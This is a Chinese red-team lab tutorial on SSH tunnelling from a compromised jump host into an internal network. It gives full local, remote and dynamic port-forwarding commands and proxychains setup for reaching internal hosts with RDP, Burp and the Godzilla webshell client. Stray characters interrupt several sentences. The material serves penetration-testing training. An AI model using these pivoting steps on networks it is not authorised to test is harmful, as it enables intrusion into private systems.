紅隊滲透系列-內(nèi)網(wǎng)穿透之SSH隧道端口轉發(fā)
本文視頻地址:
https://www.bilibili.com/video/BV1oP411n7uT/
條件:
獲取到跳板機權限(獲取到賬戶密碼)
跳板機(邊緣機)SSH服務啟動
靜態(tài)端口轉發(fā)-本地/遠程端口轉發(fā)
是指轉發(fā)的目標應用程序的 IP 地址和監(jiān)聽端口是固定的
SSH 端口轉發(fā)常用參數(shù)
-L 本地端口轉發(fā)
-R 遠程端口轉發(fā)
-C 壓縮傳輸
-N 靜默連接
-g 允許遠程主機連接本地的轉發(fā)端口
-f? SSH傳輸后臺執(zhí)行
-D 動態(tài)轉發(fā)
靶場環(huán)境
攻擊機 kali 網(wǎng)卡橋接模式 192.168.1.5
跳板機(邊緣機)centos? 網(wǎng)卡1橋接模式 192.168.1.24? ? ? ? 網(wǎng)卡2 僅主機模式 10.10.30.128
目標機win7-3 網(wǎng)卡1 僅主機模式 10.10.30.77
目標機win7 x64 網(wǎng)卡1 僅主機模式 10.10.30.7
本地端口轉發(fā)-在攻擊機上執(zhí)行命令
ssh? -CfNg -L 本地監(jiān)聽端口:目標IP:目標端口 賬號@跳板機
ssh -CfNg -L 7788:10.10.30.77:80 root@192.168.1.24
滲透工具設置
火狐不需要設置代理,直接訪問本地端口7788,就是訪問10.10.30.77:80端口即可
http://192.168.1.5:7788/
遠程桌面不需要設置代理湿滓,直接連接本地7789端口即可
ssh -CfNg -L 7789:10.10.30.77:3389 root@192.168.1.24
rdesktop 192.168.1.5:7789
遠程端口轉發(fā)-在跳板機(邊緣機/靶機)上執(zhí)行命令
ssh -CfNg -R 攻擊機IP:攻擊機端口:目標機IP:目標端口 攻擊機賬號@攻擊機ip
ssh -CfNg -R 192.168.1.5:7777:10.10.30.77:80 root@192.168.1.5
火狐不需要設置代理遭京,直接訪問本地端口7777
http://127.0.0.1:7777 或者 http://localhost:7777
動態(tài)端口轉發(fā)畏梆,SSH隧道的socks代理芍碧,而neo regeorg是HTTP隧道的socks代理
目標應用程序的ip地址和監(jiān)聽端口不固定
ssh -Nf -D 12345 root@192.168.1.24
代理工具proxychains的設置
vi /etc/proxychains4.conf
[ProxyList]
socks5 0.0.0.0 12345
滲透工具利用proxychains設置
rdesktop
proxychains rdesktop 10.10.30.77
burp
proxychains java -jar burpsuite.jar
godzilla
proxychains java -jar godzilla.jar
火狐瀏覽器
在setting->network-setting->Manual proxy configuration->SOCKS Host->127.0.0.1& port ->12345
火狐直接訪問 http://10.10.30.77/
如果火狐走burp代理,則設置站故,然后burp 用proxychains啟動即可
在setting->network-setting->Manual proxy configuration->HTTP Proxy->127.0.0.1& port ->8080
proxychains java -jar burp.jar